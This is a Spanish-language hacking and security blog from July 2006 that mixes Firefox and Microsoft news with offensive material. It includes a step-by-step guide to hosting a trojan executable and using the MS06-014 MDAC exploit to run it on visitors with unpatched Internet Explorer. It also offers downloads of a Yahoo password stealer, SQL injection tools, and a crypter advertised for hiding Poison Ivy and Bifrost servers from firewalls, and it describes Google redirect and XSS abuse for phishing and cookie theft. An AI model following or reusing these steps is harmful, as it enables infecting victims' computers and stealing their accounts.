ecoestadistica.com

lunes, julio 31, 2006

Nuevo Firefox 1.5.0.6 RC1 en castellano...

La Fundación Mozilla ha liberado la Release Candidate 1 de la versión 1.5.0.6 de su navegador Firefox, que ya puede ser libremente descargada.

Junto a la versión 1.5.0.5 en castellano, en el servidor FTP de la Fundación Mozilla ya podemos encontrar la Release Candidate 1 que puede ser descargada de AQUI

RemoveWGA 1.2.

Nueva versión de una utilidad destinada a eliminar los "efectos secundarios" de la protección Windows Genuine Advantage (WGA) de Microsoft.
Esta versión de RemoveWGA ahora emplea 3 métodos diferentes de eliminar WGA, dependiendo de la versión de WGA instalada en nuestro sistema.

Download

Fake Google Toolbar...

Se ha reportado una falsificacion del ejecutable de la barra de tareas de google, que oculta un troyano.
Era de esperarse...a google se le advirtio¨Si usted pone ejecutables en su web, era cuestion de tiempo que los phishers hagan lo mismo¨.

Esto probablemente cae en la categoría de Pharming más bien que de Phishing, como esto en realidad no tiene la intención directamente de comprometerle pidiéndole información,lo que realmente trata de conseguir es instalar algo basado en una marca que usted, como se supone, confía.Pero el engaño a alguien para instalar esta barra de tareas podría conducir a la pérdida de la información, pero también a más phishing, porque el anti-phishing incorporado en la Barra de tareas de Google obviamente será desactivado.

Fuente:http://www.cio.com

domingo, julio 30, 2006

Herramienta de Microsoft para bloquear la futura descarga de Internet Explorer 7

Según los planes de Microsoft la fecha de lanzamiento final para Internet Explorer será en el último trimestre de este año (pero con Microsoft no puedes estar seguro, por ahí te puede salir con que lo posterga hasta marzo del año 2025). Cuando esto pase, quieren estar seguros de que todos los usuarios que tengan Internet Explorer 6, migren a la versión 7, de qué modo lo van a hacer? Por medio de Windows Update, lo que todavía no se está seguro es si va a ser de manera obligatoria.

Si bien Gary Schare, director de productos de Internet Explorer, ha explicado que los usuarios tendrán la opción de elegir si quieren instalar o no el navegador
Lo sorprendente es que ahora me encuentro que ellos mismos sacaron una herramienta llamada Internet Explorer 7 Blocker Toolkit (especialmente dirigida a los administradores de sistemas) que permitiría bloquear la instalación automática de la nueva versión de Explorer.

Guia para ejecutar un archivo en una Pc remota usando el exploit Mdac(ms06-14)...

En principio debemos descargar las siguientes herramientas:

1.Cualquier programa de FTP SERVER, como por ejemplo Serv-U (lo puedes descargar de www.serv-u.com)
2.Python 2.4.3 (Download)
3.El registro en cualquier DNS dinamico (www.dyndns.com)
4.Finalmente descargamos el exploit de AQUI

A.-Configuramos el setup del server (Ej:ftp://xxxxxx.ath.cx/).Si utlizas IP dinamica, asegurarse que en el registro en www.dyndns.com, conseguimos un nombre de host igual...Luego subimos nuestro archivo ejecutable al directorio raiz (Ej:ftp: // xxxxxx.ath.cx/trojano.exe).
B.-Instalamos python 2.4.3 ( Ej:C:\python24\ )
C.-Guardamos el exploit que descargamos en el directorio de python(Ej:C:\python24\exploit.py )
D.- Click en Inicio >> Ejecutar >> y escribimos "c:\python24\python exploit.py ftp://xxxxxx.ath.cx/trojano.exe index.html"
E.-Copiamos index.html al directorio raiz del ftp(Eg. ftp: // xxxxxx.ath.cx/index.html).Lo más importante es que el archivo ejecutable (Eg. Trojano.exe) y el archivo "index.html" deben estar en el mismo dominio (Eg. ftp: // xxxxxx.ath.cx/)
F.-Ahora tenemos creado el siguiente enlace (Eg. ftp: //xxxxxx.ath.cx/index.html), y el archivo será ejecutado sobre la Pc remota, si alguien tiene acceso al link usando Internet Explorer sin parchar...

viernes, julio 28, 2006

Firefox Javascript navigator Object Code Execution...

El bug siguiente fue probado sobre Firefox 1.5.0.4 corriendo sobre Windows 2000 SP4,Windows XP SP2, y Gentoo Linux recientemente actualizado. Este bug fue relatado por TippingPoint y fijado en la 1.5.0.5, última liberación de Mozilla Firefox. . El enlace de demostración intentará lanzar "calc.exe" sobre sistemas de Windows y "touch /tmp/METASPLOIT" sobre sistemas Linux.

Prueba de Concepto

Creditos:HDM

Bug en Yahoo Messenger...

Se publico una Vulnerabilidad en el messenger de yahoo,que basicamente consistiria en que si usted recibe un mensaje Privado con lo siguiente:





(sin las comillas) el Yahoo messenger abrira en este caso google.com en el Internet Explorer de la víctima.

Prueba de Concepto:

1.- Abrir y loguearse en el messenger de yahoo.
2.-Abrir Yahoo chat como yahelite por el protocolo Ymsgr y registrarlo con otra cuenta.
3.-Envíar un mensaje privado a la cuenta de messenger con el codigo anterior...
4.-El usuario remoto abrirá www.google.com (esto puede cambiarse) .

Nota: "helomsg :" este espacio debe ser creado con alt+0160 y esto "s: " con el space. O sea el principio del string deberia quedar asi:

s:[space]helomsg[alt+0160]:+)...

jueves, julio 27, 2006

Hacking Tools

XCODE v1.0 (version PHP)
Image Hosting by PicsPlace.to

Download
-----------------------------------------------------------------------------------------------

NOD32 Anti Virus Exploit
Image Hosting by PicsPlace.to

Download
-----------------------------------------------------------------------------------------------

Yahoo Password Sender
Image Hosting by PicsPlace.to

Download

miércoles, julio 26, 2006

Contraseñas más seguras en Windows Vista...


Hasta ahora, existían muchos métodos para craquear las contraseñas de los sistemas Windows, incluso Windows XP,heredados del método hash LM de Windows 9x, como Cain,Ophcrack,SAMInside, pwdump, entre otros.
Para Windows Vista se ha modificado el formato del registro SAM y SYSTEM, inhabilitado los distintos métodos disponibles hasta el momento para la obtención de las contraseñas del sistema, además de la sustitución del débil hash LM por NTLM, un hash MD4 de 16 bytes.

Sin embargo, expertos en seguridad conjeturan con diversos metodos el poder acceder a la cuenta del administrador en Windows Vista, a pesar de los esfuerzos de microsoft por ocultar la misma en el sistema.Si bien muchas herramientas deberan actualizar su metodo de funcionamiento a esta nuevas cuestiones, a pesar de ello y como lo explican aqui, parece que no pasara mucho tiempo para que ello ocurra.

martes, julio 25, 2006

Ser hackeado "al vuelo"

Este interesante vídeo, exhibido en el McAfee Avert Labs Day, muestra una así llamada infección al vuelo: un sistema es hackeado simplemente al visitar una web especialmente desarrollada. El atacante instala malware e intenta esconder el ataque del sistema y el software de seguridad. El usuario nunca ve avisos de seguridad...



Fuente:Un espia en el Silicon Valley.
Origen: Kriptopolis

lunes, julio 24, 2006

Anonimato: Tork facilita el uso de Tor

TorK es un controlador para Tor en KDE, que permite manejar, actualizar, monitorizar y controlar Tor. También permite visualizar la red Tor y elegir el modo de interactuar con ella.

Para instalar TorK antes hay que bajar el código (versión alpha, 700 KB) y compilarlo al modo habitual.

Al arrancar Tork se pone en marcha su asistente, que permite descargar Tor y Privoxy si no se tienen, o señalar la ubicación de sus ejecutables si ya se dispone de ellos. Después, permite configurar un cliente y servidor de Tor de diferentes formas...

Está también disponible un vídeo que muestra el funcionamiento de Tork.

Origen:Kriptopolis

domingo, julio 23, 2006

Scrapbook, extensión para Firefox que nos permite coleccionar sitios web

Scrapbook es una extensión de Firefox que va más allá de los marcadores. Nos permite guardar, gestionar y editar nuestras páginas favoritas a través de Firefox. Sus características son rápidas, ligeras, exactas y tiene soporte multi- idiomas.

Sus características principales son:

  • Guardar una página web
  • Guardar un recorte de una página web
  • Guardar el sitio web entero
  • Organizar nuestras colecciones como si fuesen los marcadores
  • Buscador de texto completo y fitrado de búsqueda rápido de la colección
  • Edición del sitio web coleccionado
  • Edición texto/HTML semejante a las notas de Opera.

Una interesante extensión que en este caso no nos hace depender de servicios de terceros para coleccionar sitios webs completos, editarlos, capturar parte del contenido, entre otras funciones. Funciona desde la versión 1.5 hasta la 2.0b1 de Firefox.

Enlace | Scrapbook

XSS en paypal.com

Prueba de Concepto

miércoles, julio 19, 2006

Modificando tu Firefox 2.0... (segunda parte)

continuando con la posibilidad de modificar la version 2.0 del firefox, podemos hacer lo siguiente:

Abrir Etiquetas y Scrolling de Etiquetas

La Caracteristica Abrir Etiqueta Reciente es muy práctico. Esto no recuerda solamente su última etiqueta cerrada como la mayoría de la gente piensa. Podemos seguir seleccionando la opción de Abrir Etiqueta Reciente del menú , con el botón derecho y seguirá volviendo a abrir ventanas antes cerradas. Esta opción puede ser encontrada en varias extensiones diferentes pero es siempre practico tener las caracteristicas empotradas.

El scrolling de etiquetas es molesto, porque Mozilla pensó que sería una buen idea impedir a las etiquetas ponerse microscópicas en el tamaño y en cambio las haría enrollar. Pero a no preocúparse porque podemos ajustar la anchura mínima de una etiqueta antes de que esta comience a enrollarse. La opción tabMinWidth es la anchura mínima de la etiqueta antes de que comience a enrollarse. El tabClipWidth es el mínimo que debe poseer una etiqueta para mostrar la "X" que es usada para cerrar la etiqueta.
  1. Iniciamos Firefox.
  2. En la barra de direcciones tipeamos “about:config” y presionamos Enter.
  3. Boton derecho del mouse y seleccionamos Nuevo->Entero.
  4. En el cuadro de dialago sobre el nombre de preferencia que aparece, introducimos: “browser.tabs.tabMinWidth” (sin las comillas). Presionamos Aceptar para continuar.
  5. Seleccionamos el valor mínimo que queremos para la anchura de las etiquetas (me puse el mío a 0 y el valor por defecto es 125). Entonces confirme con la tecla OK otra vez.
  6. Pulsar el botón derecho del ratón y seleccionar Nuevo ->Entero.
  7. En el cuadro de dialogo sobre el nombre de preferencia que aparece, introducimos: "browser.tabs.tabClipWidth" (sin las comillas). Confirmamos con la tecla Aceptar para seguir.
  8. También puse este valor a 0 pero pueden escoger cualquier mínimo que les guste. El valor por defecto es 115. Entonces confirmamos con la tecla Aceptar otra vez.


Plu-gin para Firefox:Webdeveloper
La extensión Webdeveloper instala una barra de tareas con muchas utilidades para analizadores de web como ser HTML-VALIDATORS, un editor de CSS, etc. Algunas de estas caracteristicas pueden ayudarle a conseguir el control completo de un website.

Image Hosting by PicsPlace.to

Puedes descargar la extension de AQUI o AQUI

Hacking Tools...

Hacking Pack v1.0
Image Hosting by PicsPlace.to

Download
----------------------------------------------------------------------------------------

SQL tools
Image Hosting by PicsPlace.to

Download
----------------------------------------------------------------------------------------

Blind SQL inject Tools
Image Hosting by PicsPlace.to

Download

lunes, julio 17, 2006

Nuevos rootkits con mejor capacidad de ocultación

En el mundo de la seguridad informática, algunos pueden parecer muy paranoicos ante amenazas que no son especialmente peligrosas, pero es necesario tener en cuenta que, una vez se ha descubierto un bug o un ataque contra un sistema este ataque tenderá a mejorarse nunca a mitigarse.

En el caso de los rootkits, aplicaciones que se instalan en nuestro ordenador sin dejar ningún rastro de su presencia cuando se están ejecutando, sucede algo muy parecido, de forma que hay una carrera entre creadores de rootkits y los programadores de detectores en la que los primeros siempre suelen ir un paso por delante.

Uno de los últimos especímenes conocidos es el Rustock.A que según algunos expertos marca un antes y un después en el mundo de los rootkits. Utiliza algunas técnicas innovadoras para esconderse en el sistema, como guardarse en los Alternate Data Streams, una estructura en el disco usada por el sistema NTFS, además de esconder esta estructura ante el sistema.

Otras técnicas utilizadas son la inexistencia de un proceso ejecutándose, ya que el rootkit se ejecuta dentro de hilos del núcleo de Windows y de drivers del sistema.Afortunadamente, la última versión de BlackLight, un detector de rootkits, ya detecta esta nueva especie.

Fuente |Digg.

Seguridad: Anti-Rootkits

Image Hosting by PicsPlace.to

Download

domingo, julio 16, 2006

Microsoft retira Private Folders

Microsoft ha decidido retirarlo a causa de las presiones de clientes corporativos que se quejaron de la dificultad de controlar su uso en los ordenadores de la organización.

Las empresas necesitan saber como impedir que los usuarios puedan instalar este programa y que pueden hacer en el caso de que el usuario pierda ficheros al olvidar la contraseña. A causa de esto, el programa dejará de estar disponible en breve.

Un movimiento bastante extraño por parte de Microsoft, ya que se puede impedir la instalación de este programa por los cauces habituales, a través de los permisos que se concede a cada uno de los usuarios. Si un usuario puede instalarse este programa, también podrá hacerlo con muchos otros que están disponibles en Internet.

Si alguno quiere utilizarlo aun está a tiempo durante unos días de proceder a su descarga.

Fuente | News.com.

sábado, julio 15, 2006

MS IE Denial of Service (FolderItem Access)

Defecto testeado en Internet Explorer 6, sobre Windows XP SP2 con todas las actualizaciones.

Prueba de Concepto

jueves, julio 13, 2006

Modificando tu Firefox 2.0...(primera parte)

Si ya te descargaste la version 2.0 del firefox, que puse en un post anterior, despues de instalarlo, habras notado que la mayoria de las extensiones no funcionan,es decir son incompatibles con esta version.
Pues aqui te aconsejo un modo de poder hacerlas compatibles, y conservar la apariencia y el diseño al que nos habiamos acostumbrado en la version anterior.
La tarea es sencilla, para ello nos descargamos la utilidad Nightly Tester Tools.
Luego de la descarga e instalacion, reiniciamos firefox, y la utilidad se habra instalado.
Click, y comenzamos a buscar en nuestro disco los archivos de extensiones que teniamos instaladas anteriormente.Lo conveniente es que pruebes hacerlo uno por uno.



OTROS TRUCOS:

Restaurar Sesion
La Session Restore es una ventaja en Firefox 2. Ahora, esto no sólo puede restaurar su sesión después de sus caidas de sistema, ya que podemos hacer que esto también restaure su sesión si tenemos que comenzar de nuevo después de la instalación de extensiones o después de la actualizacion de Firefox.Es decir retomar la sesion en el mismo estado en que lo dejamos al cerrar firefox.

1. Iniciamos Firefox.
2. En la barra de direcciones tipeamos “about:config” y presionamos Enter.
3. Boton derecho del mouse y seleccionamos Nuevo->Cadena.
4. En la caja de dialogo del nombre de la preferencia tipeamos lo siguiente y luego enter “browser.sessionstore.resume_session” (sin las comillas). Presionamos OK y continuamos
5. Seleccione "Verdadero" del dialogo y confirmamos con la tecla OK otra vez.

X Roja (Botón Cerrar)
A algunas personas no les gusta que Mozilla haya añadido un botón cerrar a cada etiqueta. Bien, podemos conseguir una extensión para quitar esas X, de hecho hay múltiples opciones que podemos hacer: que muestre un botón cerrar sobre la etiqueta activa sólamente, que muestre botones para cerrar sobre todas las etiquetas,que no muestre ningún botón, o que muestre un botón solo al final de la tira de etiquetas. Aquí está como podemos personalizar la colocación:

1. Iniciar Firefox.
2. En la barra de direcciones tipeamos “about:config” y presionamos Enter.
3. Boton derecho y seleccionamos Nuevo->Entero.
4. En la caja de dialogo del nombre de la preferencia tipeamos lo siguiente y luego enter “browser.tabs.closeButtons” (sin las comillas). Presionamos OK para continuar.
5. Ahora tenemos que seleccionar el tipo de botón cerrar que queremos: 0 - muestra un botón cerrar sobre la etiqueta activa sólamente, 1 - muestra botones cerrar sobre todas las etiquetas, 2 - no muestra ningún botón cerrar, y 3 - muestra un botón cerrar solo al final de la tira de etiquetas. Después de elegir el valor correspondiente a su preferencia confirman con la tecla OK otra vez.

MS IE Denial Of Service (RevealTrans Transition)

Este defecto fue probado en la ultima version del Internet Explorer 6 bajo Windows XP SP2 con todos los parches.

Prueba de Concepto

Creditos:HDM

miércoles, julio 12, 2006

Firefox 2.0 beta 1 en castellano.

Su lanzamiento estaba previsto para ayer día 11 de julio, y aunque una Release Candidate de la beta 1 podía ser descargada desde hace algún tiempo, la oficial no ha estado disponible hasta hoy.

Ya está disponible en los servidores FTP de la Fundación Mozilla, beta 1 de "Bon Echo Milestone".

Como principales novedades incluye:

- Un nuevo instalador NSIS (Nullsoft Scriptable Install System)
- Un nuevo sistema de protección Anti-Phishing.
- En la caja de búsqueda de Gogle y Yahoo! ahora aparecen sugerencias de búsqueda.

Download

MS IE Denial Of Service ( TriEditDocument URL)

Probado en Internet Explorer 6 con todos los parches, sobre Windows XP SP2.
El ajuste de propiedad URL de este objeto provoca un NULL dereference.

Prueba de Concepto

Creditos:HDM

martes, julio 11, 2006

UPHClean: Apagado Rapido de Windows

Muchas veces Windows tarda bastante en apagarse (del orden de minutos), y a lo mejor te preguntas qué está haciendo para tardar tanto. La respuesta es, la mayoría del tiempo, no está haciendo nada. Para ser más exactos, se queda esperando a que terminen las aplicaciones que tienen bloqueado el perfil, o incluso el registro. Algunas de las aplicaciones de terceros no se cierran todo lo bien que quisieran, hasta el punto de terminar su ejecución pero manteniendo los recursos indefinidamente. Windows tiene un tiempo máximo de espera, una vez llegado al cuál se cierran a la fuerza aquellas aplicaciones que todavía queden.

Para solucionar esta molesta "característica", Microsoft sacó hace un par de meses un pequeño programa (servicio/demonio) llamado UPHClean (User Profile Hive Cleanup Service) para limpiar en un segundo plano las salidas de las aplicaciones, lo que, entre otras cosas, nos recorta el tiempo de apagado.

Como todos saben, microsoft requiere la validacion de windows para realizar la descarga.

Una vez realizada la instalación -y sin requerir siquiera reinicio- se ejecuta en segundo plano como servicio (todos los detalles técnicos aquí).

Puede descargarse UPHClean desde aquí (Microsoft, fichero MSI, 329 KB). (No necesita validacion)


Path conversion design flaw in Microsoft NTDLL ...

Microsoft Windows NTDLL.DLL es propenso a una vulnerabilidad de path conversion incorrecta. Este defecto podría ser explotado por usuarios malévolos para evitar mecanismos de protección puestos en práctica por ciertos antivirus y productos antispyware.

Hay un defecto de diseño en que NTDLL realiza la conversión de path entre nombres de DOS style path y NT syle path.
La vulnerabilidad es localizada en la función RtlDosPathNameToNtPathName_U que convierte de DOS path unicode a unicode NT path.

RtlDosPathNameToNtPathName_U internamente comprueba si el nombre del path dado es de NT style o está en el DOS style, llamando respectivamente aRtlpWin32NTNameToNtPathName_U o RtlGetFullPathName_Ustr. Es en estas funciones donde cada sintaxis apropiada (NT y style DOS) es comprobada.

Mas Info sobre la plataforma y el software antivirus y antispyware afectado.

Prueba de Concepto:
Ejecute lo siguiente en una ventana de comando:


y podra observar como se crea el archivo ¨malware.exe¨ en el sistema sin que lo detecte el antivirus o el antispyware...




Creditos:Mario Ballano Bárcena

Parches de Julio de Microsoft...

Esta vez son 5 de gravedad crítica y 2 de gravedad importante.
Como ya sabiamos 3 de ellos parchean vulnerabilidades de distintas versiones del paquete Office.
Estos son los parches publicados:

Gravedad crítica:
MS06-035:Vulnerability in Server Service Could Allow Remote Code Execution (917159)
MS06-036:Vulnerability in DHCP Client Service Could Allow Remote Code Execution (914388)
MS06-037:Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (917285)
MS06-038: Vulnerabilities in Microsoft Office Could Allo w Remote Code Execution (917284)
MS06-039:Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (915384)

Gravedad importante:
MS06-033: Vulnerability in ASP.NET Could Allow Information Disclosure (917283)
MS06-034: Vulnerability in Microsoft Internet Information Services using Active Server Pages Could Allow Remote Code Execution (917537)


Origen: www.microsoft.com/technet/

Fuente

Paper: Como Utilizar a Google para un Ataque de Phishing...

Google y Yahoo tienen un defecto de redireccionamiento de URL que pueden ayudar para un ataque de Phishing, distribución de troyanos, spammers, etc.

Si un usuario posiciona su cursor sobre un enlace, este debería mostrarle a donde va a dirijirlo. Pero no siempre es el caso y dos de los motores de búsqueda mas populares, contribuyen al problema.

Algunos detalles de estas vulnerabilidades han sido relatados con anterioridad, pero los problemas no han sido solucionados. El ejemplo siguiente muestra como una URL enviada mediante un mail o integrada en una pagina web, puede tener su ubicacion verdadera enmascarada con la ayuda de Google. Coloque su cursor sobre los links siguientes y luego haga click sobre ellos para ver lo que sucede:

Note que usted no se dirijio al sitio de Google aun cuando el texto en la barra de direcciones y la URL sobre la barra de estado indicara lo contrario. Note que la verdadera URL (sobre todo en el ejemplo Firefox) no es reconocible como una URL para la mayoría de la gente, ya que la mayoria de las personas no puede reconocer la dirección de IP como un URL sin ' HTTP: ' incluido.

Yahoo tiene problemas similares en los cuales ellos utilizan el redireccionamiento de URL sin necesidad de cargar una de sus páginas. Pero no se ha encontrado un modo de ocultar el http: //.

Es que el redirector de Yahoo requiere el http: // entonces es un poco más obvio. Aunque muchos usuarios probablemente se engañaran con ello.

Google puede avanzar un poco mas sobre este tema. Ponga su cursor sobre este ejemplo y luego trate de decirme que esto no engañaría a la mayor parte de los usuarios finales:
  • PayPal.com
  • Lo bueno de esto, es que funciona con IE y Firefox : Paypal.com
    Notese la cantidad excesiva de numeros al final de la URL.
Combine esto con un poco de ingeniería social como una mención a la sociedad Google / PayPal y usted podria engañar a unos cuantos.
Google y Yahoo deberian solucionar este problema. No sería difícil asignar una sesión ID a un usuario y requerirla que sea parte de la URL para recien redirijirlo. En Google (o Yahoo) la sesión ID simplemente tendría que fijarse que fue asignado a una dirección IP particular. Si ello no coincide, la URL no sera mostrada a ese usuario por Google. Seguramente hay otros modos de solucionar esto también.

Referencias:
Seclists

MS IE Denial Of Service (HtmlDlgSafeHelper fonts)

Este defecto fue probado en la ultima version del Internet Explorer 6 con todos los parches, sobre Windows XP SP2.
El ajuste de la característica "fonts" de este objeto provoca un NULL dereference.

Prueba De Concepto

lunes, julio 10, 2006

Curiosidad en Google????

Click

Microsoft Private Folder 1.0

Tras debutar siendo un producto disponible exclusivamente para el mercado chino, Microsoft ha puesto a disposición de los usuarios de copias legítimas de Windows XP (es decir, previo test WGA) Private Folder 1.0, una utilidad que crea una nueva carpeta (My Private Folder) cuyo contenido está protegido por contraseña.

Según Microsoft, se trata de "una herramienta útil para proteger tus datos privados de colegas, amigos, niños u otra gente que comparta tu PC o tu cuenta".

Fuente:Kriptopolis

EDIT: Sin embargo si deseas probar esta utilidad sin necesidad de pasar por la validacion de Windows...puedes hacerlo directamente descargando el programa de AQUI o desde el sitio Oficial de Microsoft AQUI

hacking Tools...

PHP Inject
Image Hosting by PicsPlace.to

Download
-----------------------------------------------------------------------------------------

Hack and Crack
Image Hosting by PicsPlace.to

Download 1
Download 2
Download 3
-----------------------------------------------------------------------------------------

Cigicigi File Crypter v1.0
Image Hosting by PicsPlace.to

[+] Cigicigi File Crypter usa el cifrado XOR.
[+] Utiliza"user level unhooking" .Lo que permite el baypass del Firewall
[+] Cigicigi File Crypter soporta datos EOF. Entonces usted puede también encriptar los servidores de Flux,Bifrost,Poison Ivy,etc..

Mirror 1
Mirror 2
Mirror 3

MS IE Denial Of Service (Object.Microsoft.DXTFilter Enabled)

El bug siguiente fue probado sobre la última versión de Internet Explorer 6 sobre Win XP SP2 con todos los parches. Poniendo la propiedad 'Enabled' de este control a un valor verdadero, podemos provocar un NULL dereference.

Prueba de Concepto

Creditos:HDM

domingo, julio 09, 2006

MS IE Denial Of Service (DirectAnimation.DAUserData )

El bug siguiente fue probado sobre la última versión de Internet Explorer 6 en Windows XP SP2 con todos los parches. La característica"Data" del objeto DAUserData es diseñada para tener acceso sólo después de que ha sido inicializado.

Prueba de Concepto

Creditos:HDM

viernes, julio 07, 2006

Siete parches y final para Windows 98, Me y SP1

Microsoft planea publicar siete parches de seguridad el próximo martes 11 de julio, cuatro de ellos para Windows y tres para Office, según el anuncio de la propia compañía. Es también el final del soporte para Windows 98, 98 SE, Me.

El máximo nivel en que están catalogados los parches anunciados, es el de "Crítico", tanto los de Microsoft Windows, como los de Microsoft Office.

El final del soporte técnico ampliado para Windows 98 y Me, no solo significa que ya no se publicarán parches de seguridad, sino también que en el futuro, la mayoría de los nuevos programas o futuras versiones de programas actuales de muchos fabricantes (no solo Microsoft), así también como mucho nuevo hardware, solo funcionarán en Windows XP SP2 o superior.

Esto es porque también se aproxima el final del ciclo de soporte técnico estándar para Windows XP SP1, anunciado para octubre de este mismo año. Es recomendable que los usuarios de Windows XP que no lo han hecho aún, se actualicen a Windows XP SP2. Los usuarios de Windows anteriores, si no actualizan su sistema operativo (lo que en la mayoría de los casos significa el cambio de hardware), verán seriamente restringidas sus posibilidades, y sobre todo la protección de sus equipos.

Por otra parte, el martes 11 de julio, Microsoft publicará también al menos una actualización no relacionada con la seguridad, a través de Microsoft Update (MU) y Windows Server Update Services (WSUS).

Más información:
Microsoft Security Bulletin Advance Notification

MS IE Denial Of service (Table.Frameset)

El bug siguiente fue probado sobre la última versión de Internet Explorer 6,totalmente parchado,en Windows XP SP2. Este defecto fue encontrado por Aviv Raff usando el Fuzzer Script DOM-HANOI.

Prueba de Concepto

Creditos:HDM

jueves, julio 06, 2006

MS IE Denial Of Service (StructuredGraphicsControl SourceURL)

El Bug siguiente fue probado sobre la última versión de Internet Explorer 6 con todos los parches, sobre Windows XP SP2. Este defecto parece ser provocado por una llamada a URLOPENBLOCKINGSTREAM () con un indicador NULO referido por el argumento ppStream.

Prueba De Concepto

Creditos:hdm

miércoles, julio 05, 2006

Vulnerabilidad Cross Site Scripting en Google...

Google es vulnerable a un ataque del tipo Cross-Site Scripting.Concretamente en la seccion de personalizacion de paginas de google.
Los empleados en Google eran conscientes de la posibilidad de XSS y se protegieron contra ello como una condición de error, sin embargo si usted introduce una URL válido, que contiene el Feed de un sitio, esto volverá con la ejecucion del JavaScript que contiene el URL.

Prueba De Concepto

Esto es una prueba benigna de concepto. Solo usa query string de una Feed válida para inyectar el vector de XSS. Esto no trabaja si usted lo inyecta en la función Add Content de la pagina, ya que la pagina en si misma esteriliza la salida.

Adicionalmente, Google sufre tambien de un ataque de redireccion de URL, que puede ser usado para ataques de phishing localizados, las pruebas de concepto siguiente lo remitira a mi blog, al solo fin de demostrar el ataque:

Prueba de Concepto
Prueba de Concepto
Prueba de Concepto
Prueba de Concepto
Prueba de Concepto

Pero regresando al vector de ataque XSS, ¿Cuáles son las implicaciones de este ataque para Google? Bien, para programadores, puedo poner un sitio de phishing sobre Google. " Pruebe el Google World Beta. " Puedo robar cookies para conectarme como el usuario en cuestión, puedo usar credenciales del usuario para proteger o quitar cualquiera contenido de su www, incluyendo opciones que se cambian como la agregación de mi RSS Feed a su página, o la supresión de ellos, etc. … puedo robar su número de teléfono usando la aplicacion /sendtophone vía un XML RPC (AYAX) llamando vía un método POST, conseguir su dirección particular porque maps.google.com es reflejado sobre http: // www.google.com/maphp? hl=en*tab=wl*q = etc.

Creditos:RSnake

martes, julio 04, 2006

GreenBorder Pro: Como proteger tu PC durante la navegación

Para los que siguen navegando con Internet Explorer, una capa de protección adicional nunca viene mal e, incluso para los que lo hacen con otros navegadores como Opera o Firefox, puede ser necesario algo como GreenBorder Pro si no acabamos de fiarnos de estos navegadores.

GreenBorder Pro utiliza la virtualización para proteger nuestro ordenador de los peligros que puedan acecharle cuando estemos navegando por Internet, de forma que todas aquellas acciones que se realizarían en nuestra máquina (instalación de programas, modificación o lectura de ficheros privados,...) no se llegan a ejecutar.

Cuando ejecutamos este programa, nos muestra un marco verde alrededor de las ventanas que está protegiendo, por lo que siempre sabremos si se está ejecutando. Incluye, además, un modo de mayor protección para cuando queramos hacer operaciones en páginas con contenido importante, como puede ser la de nuestro banco. En este modo, el programa se reinicia para hacer desaparecer todo lo que hubiera podido suceder anteriormente en la sesión y cuando terminamos la operación, borra todos los datos de la sesión para que no puedan recuperarse posteriormente.

Podemos añadir también esta protección a ficheros que tengamos en nuestro ordenador. Imaginemos, por ejemplo, que recibimos una imagen de alguien. Como no estamos seguros de que esta imagen sea inocua, la protegemos mediante la función SafeFiles y la abrimos. El programa utilizado para abrirla mostrará el marco verde indicando que se está protegiendo el ordenador. Si la imagen estuviera contaminada e incluyera un virus que quisiera instalarse en nuestro ordenador, GreenBorder lo evitaría impidiendo que este se grabara en nuestro disco.

Aprovechad para descargarlo ahora, ya que las primeras 10.000 descargas reciben una licencia gratuita durante un año.

Vía | The PC Doctor.
Enlace | Green Border.

Paper: como funciona una heurística antivirus??? (Segunda Parte)

Existen 5 métodos típicos que se emplean en matemáticas y estadísticas explotarorias y de modelado. Estos métodos son:

* Tabú search (TS, Búsqueda tabú)
* Genetic algorithms (GA, Algoritmos genéticos)
* Método Hero
* Random ascent (RA, Subida azarosa)
* Simulated annealing (SA, Temple simulado)

La búsqueda tabú

Este algoritmo es francamente útil. Teóricamente, se emplea para poder evitar caer en el cálculo de óptimos locales, que evidentemente no serán óptimos en todo el espacio de soluciones. Este efecto se consigue empleado estructuras de memoria, que retienen las soluciones ya exploradas y que por tanto, serán evitadas en futuras exploraciones, incurriendo en un ahorro computacional interesante.

En motores antivirus heurísticos, las listas tabú pueden emplearse con fines similares: evitar la caída en soluciones locales óptimas que no sean proyectable a un espacio de soluciones mayor. Un buen motor heurístico debe evitar excelentes detecciones proactivas de ciertas familias a costa de no explorar soluciones en otras familias de muestras.

Algoritmos genéticos

Muy interesantes para determinar soluciones heurísticas. En este caso, se toma un universo de soluciones determinada, y se hace un ajuste de puntaje, en función a la calidad de la solución. Se descartan las soluciones menos óptimas y se refunden las restantes en universos menores, a los que se les vuelve a hacer el puntaje. Este proceso iterativo acaba, en un paralelismo con la teoría evolutiva, en la elección de las mejores soluciones.

Este sistema puede ser empleado por motores antivirus para clasificar las posibles soluciones y asignar, para cada caso, puntaciones para poder filtrar en función de la bondad del resultado obtenido para cada aproximación. Sobre el papel, la detección heurística final es la más adecuada.

Método Hero

Un método que suele aplicarse bastante en cosas muy distantes a las soluciones antivirus, la gestión del régimen selvícola y forestal, pero que puede ser empleado en una solución antivirus.

En este caso, se escoge aleatoriamente una solución inicial, en este caso un régimen de comportamiento en la detección. Esta solución inicial se enfrenta a otras soluciones de un modo secuencial, con el fin de determinar si otras soluciones plausibles mejorarían la primera elección. En caso de que se produzca la mejora, la solución original es sustituída por aquella que la mejora. Este proceso se repite hasta que la secuencia finaliza.

Subida azarosa

Parecido al anterior, pero en este caso la secuencia se detiene cuando se alcanza el número máximo de iteraciones de mejora inicialmente establecido, aún no habiendo acabado la secuencia de todas las soluciones posibles a enfrentar con la inicialmente escogida.

Temple simulado

Muy vinculado con las Redes Neuronales, este método está especialmente orientado a universos muestrales tremendamente grandes, donde el tiempo de computación es crítico, y donde por motivos obvios, no podemos invertir años para determinar la solución óptima.

Las iteraciones de optimización parte de un estado actual s0, y contempla estados próximos de solución s1, s2 … sn. El paso a estos estados se realiza si probabilísticamente el estado final se adecúa mejor a los requisitos de optimización establecidos. En motores antivirus, obviamente, los estados sn son estados de solución, entre los que se salta buscando el resultado óptimo.

Redes neuronales. ¿El futuro en la gestión antimalware?


Todos estos métodos son piezas clave de la inteligencia artificial, ya que a fin de cuentas, son métodos de decisión. Las redes neuronales son, con casi toda probabilidad, el máximo exponente de los métodos exploratorios que hemos visto.
Las ventanas de un modelo de red neuronal proporcionarían a un antivirus las mejores ventajas de un sistema de este tipo: Aprendizaje autónomo, organización interna automática, tolerancia a los fallos, flexibilidad y respuestas rápidas en tiempo real.

Origen

lunes, julio 03, 2006

MS IE OutlookExpress.AddressBook Denial Of Service...

